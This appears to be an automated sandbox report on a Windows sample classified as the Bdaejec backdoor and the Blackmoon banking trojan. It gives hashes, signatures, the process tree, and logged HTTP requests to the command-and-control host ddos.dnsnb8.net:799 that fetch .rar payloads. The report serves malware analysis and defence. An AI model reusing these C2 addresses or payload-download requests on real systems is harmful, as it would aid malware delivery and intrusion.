Overview

overview

10

Static

static

3

12ae4f607b...b3.exe

windows7-x64

10

12ae4f607b...b3.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/12/2024, 09:41 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    12ae4f607b0b1aff973d7440b64ceca4b18236cca8592d53301a8df770b903b3.exe

  • Size

    707KB

  • MD5

    74f45550738ded615663731227343b65

  • SHA1

    e08ac4a4f70da6b2d28b02532f0dc4560aef415e

  • SHA256

    12ae4f607b0b1aff973d7440b64ceca4b18236cca8592d53301a8df770b903b3

  • SHA512

    3d9edf1f8ffe4e89daa5b10b17fecef3087d9c50545f1c6efc906f4e546dce31dce7fe0ad56e4be1f957ad56b40683185a1c63e60f8d6956e6515d79c6f8e54f

  • SSDEEP

    12288:wD7qngcRLseprjstnxFe67Wkl8PggzmqGzXjDohvonDgL6jdbCjk8wFQWoPoS:wCJZdstxFe8WCfgzezvoloNbn8e

Score
10/10
bdaejecblackmoonaspackv2backdoorbankerdiscoverytrojan

Malware Config

Extracted

Family

bdaejec

C2

ddos.dnsnb8.net

Signatures

  • Bdaejec

    Bdaejec is a backdoor written in C++.

    backdoorbdaejec
  • Bdaejec family
    bdaejec
  • Blackmoon family
    blackmoon
  • Blackmoon, KrBanker

    Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.

    trojanbankerblackmoon
  • Detect Blackmoon payload 1 IoCs
  • Detects Bdaejec Backdoor. 1 IoCs

    Bdaejec is backdoor written in C++.

  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\12ae4f607b0b1aff973d7440b64ceca4b18236cca8592d53301a8df770b903b3.exe
    "C:\Users\Admin\AppData\Local\Temp\12ae4f607b0b1aff973d7440b64ceca4b18236cca8592d53301a8df770b903b3.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3316
    • C:\Users\Admin\AppData\Local\Temp\cqZybD.exe
      C:\Users\Admin\AppData\Local\Temp\cqZybD.exe
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3468
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6b401542.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4968

Network

  • flag-us
    DNS
    ddos.dnsnb8.net
    cqZybD.exe
    Remote address:
    8.8.8.8:53
    Request
    ddos.dnsnb8.net
    IN A
    Response
    ddos.dnsnb8.net
    IN A
    44.221.84.105
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k1.rar
    cqZybD.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k1.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    DNS
    228.249.119.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    228.249.119.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    105.84.221.44.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    105.84.221.44.in-addr.arpa
    IN PTR
    Response
    105.84.221.44.in-addr.arpa
    IN PTR
    ec2-44-221-84-105 compute-1 amazonawscom
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k2.rar
    cqZybD.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k2.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k3.rar
    cqZybD.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k3.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k3.rar
    cqZybD.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k3.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k4.rar
    cqZybD.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k4.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k5.rar
    cqZybD.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k5.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k5.rar
    cqZybD.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k5.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k5.rar
    cqZybD.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k5.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    DNS
    64.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    64.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k5.rar
    cqZybD.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k5.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    DNS
    217.106.137.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.106.137.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    197.87.175.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    197.87.175.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    15.164.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    15.164.165.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    92.12.20.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    92.12.20.2.in-addr.arpa
    IN PTR
    Response
    92.12.20.2.in-addr.arpa
    IN PTR
    a2-20-12-92deploystaticakamaitechnologiescom
  • flag-us
    DNS
    26.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    26.173.189.20.in-addr.arpa
    IN PTR
    Response
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k1.rar
    http
    cqZybD.exe
    564 B
     296 B
     6
    7

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k1.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k2.rar
    http
    cqZybD.exe
    564 B
     296 B
     6
    7

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k2.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k3.rar
    http
    cqZybD.exe
    472 B
     216 B
     4
    5

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k3.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k3.rar
    http
    cqZybD.exe
    564 B
     296 B
     6
    7

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k3.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k4.rar
    http
    cqZybD.exe
    564 B
     296 B
     6
    7

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k4.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k5.rar
    http
    cqZybD.exe
    472 B
     216 B
     4
    5

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k5.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k5.rar
    http
    cqZybD.exe
    472 B
     216 B
     4
    5

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k5.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k5.rar
    http
    cqZybD.exe
    472 B
     216 B
     4
    5

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k5.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k5.rar
    http
    cqZybD.exe
    472 B
     216 B
     4
    5

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k5.rar
  • 8.8.8.8:53
    ddos.dnsnb8.net
    dns
    cqZybD.exe
    61 B
     77 B
     1
    1

    DNS Request

    ddos.dnsnb8.net

    DNS Response

    44.221.84.105

  • 8.8.8.8:53
    228.249.119.40.in-addr.arpa
    dns
    73 B
     159 B
     1
    1

    DNS Request

    228.249.119.40.in-addr.arpa

  • 8.8.8.8:53
    105.84.221.44.in-addr.arpa
    dns
    72 B
     127 B
     1
    1

    DNS Request

    105.84.221.44.in-addr.arpa

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
     128 B
     1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    64.159.190.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    64.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    217.106.137.52.in-addr.arpa
    dns
    73 B
     147 B
     1
    1

    DNS Request

    217.106.137.52.in-addr.arpa

  • 8.8.8.8:53
    197.87.175.4.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    197.87.175.4.in-addr.arpa

  • 8.8.8.8:53
    15.164.165.52.in-addr.arpa
    dns
    72 B
     146 B
     1
    1

    DNS Request

    15.164.165.52.in-addr.arpa

  • 8.8.8.8:53
    92.12.20.2.in-addr.arpa
    dns
    69 B
     131 B
     1
    1

    DNS Request

    92.12.20.2.in-addr.arpa

  • 8.8.8.8:53
    26.173.189.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    26.173.189.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6IJLDY7V\k2[1].rar
    Filesize

    4B

    MD5

    d3b07384d113edec49eaa6238ad5ff00

    SHA1

    f1d2d2f924e986ac86fdf7b36c94bcdf32beec15

    SHA256

    b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c

    SHA512

    0cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\23EA5992.exe
    Filesize

    4B

    MD5

    20879c987e2f9a916e578386d499f629

    SHA1

    c7b33ddcc42361fdb847036fc07e880b81935d5d

    SHA256

    9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31

    SHA512

    bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\6b401542.bat
    Filesize

    187B

    MD5

    9ce4378757b5e6379cbafb0c029128c5

    SHA1

    d69a64dc8813f81593839969fd9460a85a754c02

    SHA256

    0d736a62925db77128203938be3710e6f57b677954e23d399023da836224c69c

    SHA512

    205e95adaa7c20f0d853c5eaa7d50be8a782f95e2c661887f86c091ef01001273d781c2f69e60325e240e7e0739f4e10adb39241407e420507493b602041b990

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\cqZybD.exe
    Filesize

    15KB

    MD5

    56b2c3810dba2e939a8bb9fa36d3cf96

    SHA1

    99ee31cd4b0d6a4b62779da36e0eeecdd80589fc

    SHA256

    4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07

    SHA512

    27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

    Download Submit

  • memory/3316-0-0x0000000000400000-0x00000000006F8000-memory.dmp

    Filesize

    3.0MB

    Download

  • memory/3316-40-0x0000000000400000-0x00000000006F8000-memory.dmp

    Filesize

    3.0MB

    Download

  • memory/3468-4-0x0000000000E70000-0x0000000000E79000-memory.dmp

    Filesize

    36KB

    Download

  • memory/3468-38-0x0000000000E70000-0x0000000000E79000-memory.dmp

    Filesize

    36KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.